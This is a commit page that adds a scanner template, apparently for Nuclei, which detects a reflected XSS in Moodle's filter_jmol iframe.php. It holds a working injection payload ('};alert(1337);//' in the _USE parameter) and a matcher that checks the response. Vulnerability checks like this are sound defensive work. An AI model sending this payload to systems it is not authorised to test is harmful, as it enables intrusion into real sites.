Create Moodle filter_jmol XSS.yaml

patch-1
SaN ThosH 2020-04-08 18:18:06 +05:30 committed by GitHub
parent f5eddff072
commit 1b346644e7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 19 additions and 0 deletions

View File

@ -0,0 +1,19 @@
id: Moodle filter_jmol XSS
info:
name: Moodle filter_jmol XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/filter/jmol/iframe.php?_USE=%22};alert(1337);//"
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "1337"
part: body